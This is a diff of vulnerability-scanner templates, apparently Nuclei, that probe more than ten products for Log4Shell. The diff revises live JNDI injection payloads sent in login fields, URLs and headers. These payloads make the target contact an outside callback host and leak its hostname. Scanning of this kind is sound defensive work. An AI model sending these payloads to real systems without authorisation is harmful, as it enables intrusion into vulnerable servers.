||||||
tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev
|
tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -30,7 +34,7 @@ http:
|
||||||
Referer: {{RootURL}}/mifs/user/login.jsp
|
Referer: {{RootURL}}/mifs/user/login.jsp
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee
|
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=password&logincontext=employee
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -47,13 +51,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by md on 2023/03/23
|
# Enhanced by md on 2023/03/23
|
||||||
|
|
|
@ -21,10 +21,14 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev
|
tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D HTTP/1.1
|
GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.search.{{interactsh-url}}%7D HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
{
|
{
|
||||||
|
@ -44,17 +48,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: kval
|
- type: kval
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by md on 2022/10/04
|
# Enhanced by md on 2022/10/04
|
||||||
|
|
|
@ -20,6 +20,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev
|
tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -33,7 +37,7 @@ http:
|
||||||
Origin: {{RootURL}}
|
Origin: {{RootURL}}
|
||||||
Referer: {{RootURL}}/goanywhere/auth/Login.xhtml
|
Referer: {{RootURL}}/goanywhere/auth/Login.xhtml
|
||||||
|
|
||||||
formPanel%3AloginGrid%3Aname=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}}
|
formPanel%3AloginGrid%3Aname=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.name.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}}
|
||||||
|
|
||||||
cookie-reuse: true
|
cookie-reuse: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
@ -46,7 +50,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
@ -61,10 +65,16 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by cs 2022/10/10
|
# Enhanced by cs 2022/10/10
|
||||||
|
|
|
@ -20,6 +20,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
|
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -32,7 +36,7 @@ http:
|
||||||
Origin: {{BaseURL}}
|
Origin: {{BaseURL}}
|
||||||
Referer: {{BaseURL}}
|
Referer: {{BaseURL}}
|
||||||
|
|
||||||
{"username":"${jndi:ldap://${sys:os.name}.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"}
|
{"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -44,7 +48,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
|
@ -56,10 +60,16 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by md on 2023/03/23
|
# Enhanced by md on 2023/03/23
|
||||||
|
|
|
@ -20,10 +20,14 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,metabase,kev,oast
|
tags: cve,cve2021,rce,jndi,log4j,metabase,kev,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/api/geojson?url=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}"
|
- "{{BaseURL}}/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.url.{{interactsh-url}}}"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -35,7 +39,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
|
@ -47,8 +51,14 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
|
@ -22,6 +22,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast
|
tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -29,7 +33,7 @@ http:
|
||||||
Referer: {{RootURL}}/opennms/login.jsp
|
Referer: {{RootURL}}/opennms/login.jsp
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
|
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -41,17 +45,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: kval
|
- type: kval
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by cs on 2022/10/23
|
# Enhanced by cs on 2022/10/23
|
||||||
|
|
|
@ -20,6 +20,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast
|
tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -30,7 +34,7 @@ http:
|
||||||
Connection: close
|
Connection: close
|
||||||
Referer: {{BaseURL}}/user/login
|
Referer: {{BaseURL}}/user/login
|
||||||
|
|
||||||
j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin
|
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=admin
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -42,7 +46,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: location
|
part: location
|
||||||
|
@ -54,8 +58,14 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
|
@ -22,6 +22,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev
|
tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -31,7 +35,7 @@ http:
|
||||||
Origin: {{RootURL}}
|
Origin: {{RootURL}}
|
||||||
Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage
|
Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage
|
||||||
|
|
||||||
{"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.{{interactsh-url}}}","strict":true}
|
{"username":"user","password":"pass","remember":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}","strict":true}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -43,13 +47,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by mp on 2022/06/03
|
# Enhanced by mp on 2022/06/03
|
||||||
|
|
|
@ -21,10 +21,14 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,jndi,log4j,rce,oast,vmware,siterecovery,kev
|
tags: cve,cve2021,jndi,log4j,rce,oast,vmware,siterecovery,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D'
|
- '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -36,7 +40,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
|
@ -48,8 +52,14 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
|
@ -11,6 +11,10 @@ info:
|
||||||
shodan-query: title:"XenMobile"
|
shodan-query: title:"XenMobile"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast
|
tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -23,7 +27,7 @@ http:
|
||||||
Origin: {{BaseURL}}
|
Origin: {{BaseURL}}
|
||||||
Referer: {{BaseURL}}/zdm/login_xdm_uc.jsp
|
Referer: {{BaseURL}}/zdm/login_xdm_uc.jsp
|
||||||
|
|
||||||
login=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin
|
login=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&password=admin
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -35,7 +39,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
|
@ -47,8 +51,14 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
|
@ -20,12 +20,16 @@ info:
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET / HTTP/1.1
|
GET / HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
X-Api-Version: ${jndi:ldap://${hostName}.{{interactsh-url}}}
|
X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -37,17 +41,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: kval
|
- type: kval
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
